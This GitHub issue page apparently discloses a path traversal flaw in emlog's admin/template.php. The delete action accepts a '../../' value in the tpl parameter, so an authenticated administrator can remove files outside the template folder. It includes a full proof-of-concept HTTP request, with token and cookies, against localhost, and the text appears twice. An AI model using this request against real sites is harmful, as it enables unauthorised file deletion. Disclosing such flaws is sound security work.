We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
First log in to the home page of the background using the administrator account Open the admin\template.php template
../../hello.txt This location is the root directory file to be deleted
poc: GET /emlog/admin/template.php?action=del&tpl=../../hello.txt&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://127.0.0.1/emlog/admin/template.php Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM_AUTHCOOKIE_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1
The text was updated successfully, but these errors were encountered:
No branches or pull requests
First log in to the home page of the background using the administrator account
Open the admin\template.php template
../../hello.txt This location is the root directory file to be deleted
poc:
GET /emlog/admin/template.php?action=del&tpl=../../hello.txt&token=c5bc68077f6da2a911df58e6cde92cbc2d0514fd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://127.0.0.1/emlog/admin/template.php
Cookie: PHPSESSID=kqfrmmnndterp04rl0cv9ls613; EM_AUTHCOOKIE_RNrgNg46hg86lUoT8Hg8Vht92Y3yU9rn=123123%7C0%7Cf98ccd4c0c66a0922a0e077a24088ba0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
The text was updated successfully, but these errors were encountered: